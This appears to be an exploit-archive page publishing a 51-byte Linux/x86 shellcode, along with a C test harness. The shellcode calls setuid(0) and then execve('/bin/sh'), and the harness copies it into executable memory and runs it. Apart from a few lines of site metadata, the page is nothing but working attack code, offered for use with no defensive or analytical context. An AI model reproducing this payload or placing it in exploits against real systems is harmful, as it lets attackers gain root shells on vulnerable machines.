Linux/x86 setuid(0) then execve("/bin/sh", [ "/bin/sh", NULL ], NULL) shellcode 51 bytes



EKU-ID: 5646 CVE: OSVDB-ID:
Author: tesla_ Published: 2016-06-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
  
/*
 * Linux/x86: 51 bytes setuid(0) then execve("/bin/sh", [ "/bin/sh", NULL ], NULL) shellcode
 *
 * tesla_ (gandung@ppp.cylab.cmu.edu)
 */
unsigned char *shellcode = "\x31\xc0\x31\xdb\x53\x8b\x1c\x24\xb0\x17\xcd\x80\x31\xc0\x31\xdb\x50\x50"
                           "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x54\x24\x0c\x8d\x4c\x24\x08"
                           "\x8d\x1c\x24\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";
  
int main(void) {
        void (*payload)(size_t a, size_t b, size_t c)__attribute__((regparm(3)));
  
        payload = mmap(NULL, sysconf(_SC_PAGESIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
  
        memcpy(payload, shellcode, strlen(shellcode));
  
        __asm__ __volatile__("call      *%%eax"
                             :
                             : "r"(payload));
  
        return (0);
}